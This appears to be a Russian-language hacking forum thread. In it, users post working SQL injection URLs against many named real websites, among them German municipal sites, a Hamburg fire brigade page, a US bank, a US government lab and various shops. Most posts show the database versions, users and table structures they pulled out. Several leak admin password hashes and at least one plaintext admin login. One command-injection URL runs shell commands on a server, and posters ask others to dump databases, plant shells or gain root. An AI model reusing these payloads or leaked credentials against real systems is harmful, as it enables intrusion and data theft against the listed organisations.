SQL Инъекции

Code:

http://chernenko.org.ua/blog.php?id=-144+union+select+concat_ws(0x3a,version(),database(),user(),@@version_compile_os),2--+

db: 5.0.51a-24-log
name_db: einstein_db1
user: einstein@selena
os: debian-linux-gnu

 

Интересно!
вывод скули происходит в флэш плеере)) через конкат не идёт так что подстааавляем что надо)

 

<<Обои для рабочего стола>>

Code:

http://artoboi.com/foto.php?id=-7794+union+select+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8--+

db: 5.1.22-rc
name_db: artoboi
user: artoboi@localhost
os: portbld-freebsd7.0

 

dbuser:[email protected]
database: deone_site
table: pages
rows:
id text

SQL-in: http://www.alternation.ru/index.php?action=page&page=8+union+select+null,null,null,null,null+from+pages/*

 

<<Молодежный интернет портал, республики коми "Штурвал">>

Code:

http://www.shturval.net/arhive.php?ID=-25+union+select+1,2,3,@@version_compile_os--+

db: 5.0.
db_name: _1 a160
user: 94 _1 a160
os: nu t- redh

 

ThinkQuest

Библиотека компании Oracle (pr7)

Code:

http://library.thinkquest.org/C001341/resources/openrev.php3?mn=c&pn=r&id=4+order+by+12/*&page=1&

дальше со скулью не смог, но нашел интересную штуку:

Code:

http://library.thinkquest.org/C0110189/cgi-bin/Load.cgi?Page=|ls -la|

можно гулять по всему серву, если кому-нибудь удастся залить шелл или еще лучше порутать, отпишите в ЛС плз, как вы это сделали

кста, хорошие маны по пхп на сайте, с примерами..

 

http://www.turkey.turmaster.ru/mountain_skiing/palandoken/hotels/show/?hid=1200+UNION+SELECT+1,2,3,4,5,unhex(hex(concat(user(),0x3a,version(),0x3a,database()))),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56+LIMIT+1,1
PR4 тИЦ120

 

studentsuccess.asu.edu - главный домен пр9

brown.edu - пр9

msm.cam.ac.uk - пр7

cnr.vt.edu - пр7

 

http://www.stadt-trebbin.de/show.php?id=-19+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--

Database Version: 4.0.27-standard-log
Database name: db99989045
User name: [email protected]

http://www.feuerwehr-hamburg.de/aktuelles/show.php?id=-1191+union+select+1,2,3,4,5,6,7,8,9,10,11,12--

Database Version: 4.1.25-log
Database name: ffhh
User name: [email protected]

http://www.monheim.de/freizeit/vereine/show.php?id=-293+union+select+concat(version(),0x3a,database(),0x3a,user(),0x3a,@@version_compile_os),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--

Database Version: 5.0.32-Debian_7etch8
Database name: sucheaz
User name: sucheaz@localhost

http://www.mindroses.de/autoren/show.php?id=-17+UNION+SELECT+1,,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--

Database Version: 5.0.26
Database name: mindroses
User name: mindroses@localhost

http://www.inec.de/show.php?id=-193+union+select+1,2,3,4,5,6,7--

Database Version: 5.0.32-Debian_7etch8
Database name: inec
User name: inec@localhost

http://www.aw-autographen.de/script/show.php?page=5&id=-018+union+select+1,2,3,4,5,6--

Database Version: 5.0.32-Debian_7etch8
Database name: db_autographen
User name: autographen@localhost

http://www.das-matratzen-haus.de/shop2/show.php?rb=397'+union+select+1,2,3,4/*

Database Version: 4.0.25-Max-log
Database name: v132849
User name: v132849@localhost

кто сдампит прошу в ЛС за плюсами

http://www.modelle-amberg-regensburg.de/show.php?id=-285+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--

Database Version: 4.0.27-max
Database name: db92260001
User name: db92260001@localhost

 

Это просто ППЦ )))) куда нафег столько много? аж 415 оО

http://www.bagshop.com/store/mcart.php?ID=-5664'+U NION+SELECT+1,2,concat_ws(0x203a20,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362,363,364,365,366,367,368,369,370,371,372,373,374,375,376,377,378,379,380,381,382,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,399,400,401,402,403,404,405,406,407,408,409,410,411,412,413,414,415+--+

5.0.45-log : fiftyone_r@localhost : fiftyone_store

 

www.domesticsupplies.co.uk

Code:

http://www.domesticsupplies.co.uk/product.php?id=-17+union+select+concat_ws(0x3a,version(),user(),database()),2,3,4,5

Версия - 5.0.45
Юзер - [email protected]
БД - verbierholidays

Code:

http://www.domesticsupplies.co.uk/product.php?id=-17+union+select+concat_ws(0x3a,username,password),2,3,4,5+from+vme_cms_users

Code:

admin:528d29f4efd0516f1bf06f2082725af4

 

http://www.jordan-altmark.de/themen.sed.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7/*

Database Version: 4.1.22-max-log
Database name: d003b735
User name: d003b735@localhost

 

www.camdennational.com

Code:

http://www.camdennational.com/personal/savings/product.php?ID=17+union+select+1,2,concat_ws(0x3a3a,version(),user(),database()),4,5,6,7,8,9,10,11

Версия - 5.0.45
Юзер - pemaquid_nystr0m@localhost
БД - pemaquid_3lmstr33t

ЮЗЕРЫ

Code:

http://www.camdennational.com/personal/savings/product.php?ID=17+union+select+1,2,concat_ws(0x3a3a,user,pass),4,5,6,7,8,9,10,11+from+tbl_people

P.S. переберием юзеров через лимит

www.uniontrust.com

Основан на той же базе (таблички все те же)

www.unp-russia.ru

Code:

http://www.unp-russia.ru/product.php?id=-17+union+select+1,concat_ws(0x3a3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12

Версия - 4.1.22-log
Юзер - [email protected]
БД - unprussia

ЮЗЕРЫ

Code:

http://www.unp-russia.ru/product.php?id=-17+union+select+1,concat_ws(0x3a3a,login,password),3,4,5,6,7,8,9,10,11,12+from+users+limit+0,1

Перебираем юзеров через лимит

 

goon.ru - Pr-4 ТиЦ 2100

PHP:

http://goon.ru/o/msg_view.htm?m_id=-1+union+select+1,2,3,4,5,concat_ws(user(),version(),database()),7,8,9--+


goon_top@localhost:5.0.51a-community-log:goon_top

 

vimss.lbl.gov pr 6

Code:

http://vimss.lbl.gov/findings/selected_image.php?id=-9%20union%20select%201,concat_ws(0x23,user(),database(),version()),3,4,5,6,7,8,9

test@localhost#vimss_WebContent#5.0.22

http://vimss.lbl.gov/admin - basic

Code:

Структура 

17 :In database afcs_WebContent found table events
   0 :   id
   1 :   description
   2 :   startDate
   3 :   endDate
   4 :   startTime
   5 :   endTime
   6 :   event
   7 :   projects
   8 :   link
   9 :   archive
18 :In database afcs_WebContent found table presentations
   0 :   id
   1 :   title
   2 :   abstract
   3 :   presenter
   4 :   fundingSource
   5 :   venue
   6 :   date
   7 :   location
   8 :   link
   9 :   fileName
   10 :   passwordProtected
   11 :   topics
   12 :   lbnlNumber
   13 :   authors
   14 :   archive
19 :In database afcs_WebContent found table projects
   0 :   id
   1 :   project
   2 :   abbreviation
20 :In database afcs_WebContent found table publications
   0 :   id
   1 :   title
   2 :   abstract
   3 :   authors
   4 :   publishedYear
   5 :   publishedBy
   6 :   publishedPages
   7 :   publishedVolume
   8 :   publishedIssue
   9 :   link
   10 :   category
   11 :   topics
   12 :   status
   13 :   editor
   14 :   lbnlNumber
   15 :   fundingSource
   16 :   archive
21 :In database afcs_WebContent found table topics
   0 :   id
   1 :   topic
   2 :   date_added
22 :In database vimss_WebContent found table Images
   0 :   id
   1 :   title
   2 :   description
   3 :   authors
   4 :   fundingSource
   5 :   fileName
   6 :   passwordProtected
   7 :   topics
   8 :   archive
23 :In database vimss_WebContent found table events
   0 :   id
   1 :   description
   2 :   startDate
   3 :   endDate
   4 :   startTime
   5 :   endTime
   6 :   event
   7 :   projects
   8 :   link
   9 :   archive
24 :In database vimss_WebContent found table presentations
   0 :   id
   1 :   title
   2 :   abstract
   3 :   presenter
   4 :   fundingSource
   5 :   venue
   6 :   date
   7 :   location
   8 :   link
   9 :   fileName
   10 :   passwordProtected
   11 :   topics
   12 :   lbnlNumber
   13 :   authors
   14 :   archive
25 :In database vimss_WebContent found table projects
   0 :   id
   1 :   project
   2 :   abbreviation
26 :In database vimss_WebContent found table publications
   0 :   id
   1 :   title
   2 :   abstract
   3 :   authors
   4 :   publishedYear
   5 :   publishedBy
   6 :   publishedPages
   7 :   publishedVolume
   8 :   publishedIssue
   9 :   link
   10 :   category
   11 :   topics
   12 :   status
   13 :   editor
   14 :   lbnlNumber
   15 :   fundingSource
   16 :   archive
27 :In database vimss_WebContent found table topics
   0 :   id
   1 :   topic
   2 :   date_added

 

Юридическая фирма Консвел

Code:

http://www.conswel.ru/index.php?issue_id=66+and+ascii(substring((select+login+from+users+limit+1),1,1))%3E1

 

http://www.symbianware.com/product.php?id=lneditor60&pl=-n6680'+union+select+1,2,concat_ws(0x3a3a,version(),database()),4,5,6+/*+
4.1.20::symbi001

http://www.teamantigua.com/anuncio.php?cat=Apartments%20For%20Rent&nsc=$.%20350-850&id=-93+union+select+1,2,3,4,5,6,7,8,9,10,11,12,TABLE_NAME,14,15+from+information_schema.tables--

http://www.video-2-cul.com/video-in.php?id=34848'+union+select+1,load_file('/var/www/vhosts/video-2-cul.com/httpdocs/bas.php'),3,4,5,6,7,8,9,10,11,12,13,14,15+from+mysql.user/*
админку не нашёл((

 

<<Kingspan>>

Code:

http://www.kingspan.ua/first.php?idsub=4&idsub1=210&idsub2=217&page=9999999999999+union+select+1,table_name,3+from+information_schema.tables--+

db:5.0.22-Debian_0ubuntu6.06.11-log
name_db: kingspanin
os: KINGSPAN - pc-linux-gnu

Code:

http://www.kingspan.ua/admin/

table: users
-=admins=-
login: admin
pass:maxmax504
+limit+x,x--+

 

[PR = 6] [SQL - 5]

Code:

http://www.itcdc.com/about.php?p=2+union+select+1,2,3,4/*

+from users

paivi:310b12fd78e579f77f570c334797fc46aivi:Salonen[email protected]:
310b12fd78e579f77f570c334797fc46:sucesso2006

[PR = 6] [SQL - 5]

Code:

http://www.ceskazbrojovka.com/index.php?idp=1&ids=3&lang=en&p=32+union+select+1--+

+from admins

emil:ae80d870eb40a8fd7c256c0ec3faf2ba511ba134:
rsvenda:d271892c3c27f69ce39784a06f95c7f30e667ece:

 

<<Рестораны Одессы "Волдай">>

Code:

http://www.valdai.com.ua/index.php?action=1&id=-4+union+select+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6--+

db: 4.0.27-standard
db_name: valdai_valdai
user: valdai_valdai@localhost
os: pc-linux-gnu

Ты не открыл для мну Америку.....